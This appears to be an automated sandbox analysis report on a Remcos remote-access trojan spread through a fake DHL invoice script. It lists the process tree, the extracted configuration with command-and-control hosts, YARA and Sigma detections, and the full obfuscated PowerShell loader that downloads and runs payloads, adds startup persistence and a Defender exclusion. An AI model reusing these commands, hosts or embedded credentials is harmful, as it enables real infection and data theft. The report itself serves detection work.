  • cmd.exe (PID: 3804 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2676 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 7892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 932 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7972 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 6408 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 6520 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6644 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 3796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["iwarsut775laudrye001.duckdns.org:57484:0", "iwarsut775laudrye001.duckdns.org:57483:1", "iwarsut775laudrye3.duckdns.org:57484:0", "hjnourt38haoust1.duckdns.org:57484:0"], "Assigned name": "Cla$$", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "shietgtst-DDGG2A", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "kanspt.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": ""}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\kanspt.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x13f30:$a1: Remcos restarted by watchdog!
          • 0x144a8:$a3: %02i:%02i:%02i:%03i
          00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            Click to see the 37 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            40.2.powershell.exe.1b33d0e6cd0.1.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              40.2.powershell.exe.1b33d0e6cd0.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                40.2.powershell.exe.1b33d0e6cd0.1.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  40.2.powershell.exe.1b33d0e6cd0.1.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x690b8:$a1: Remcos restarted by watchdog!
                  • 0x69630:$a3: %02i:%02i:%02i:%03i
                  40.2.powershell.exe.1b33d0e6cd0.1.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6317c:$str_b2: Executing file:
                  • 0x641fc:$str_b3: GetDirectListeningPort
                  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x63d28:$str_b7: \update.vbs
                  • 0x631a4:$str_b9: Downloaded file:
                  • 0x63190:$str_b10: Downloading file:
                  • 0x63234:$str_b12: Failed to upload file:
                  • 0x641c4:$str_b13: StartForward
                  • 0x641e4:$str_b14: StopForward
                  • 0x63c80:$str_b15: fso.DeleteFile "
                  • 0x63c14:$str_b16: On Error Resume Next
                  • 0x63cb0:$str_b17: fso.DeleteFolder "
                  • 0x63224:$str_b18: Uploaded file:
                  • 0x631e4:$str_b19: Unable to delete:
                  • 0x63c48:$str_b20: while fso.FileExists("
                  • 0x636c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 69 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi64_1928.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Base64 Encoded PowerShell Command Detected
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' +
                    Sigma detected: Potential PowerShell Command Line Obfuscation
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' +
                    Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f
                    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' +
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1928, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 6908, 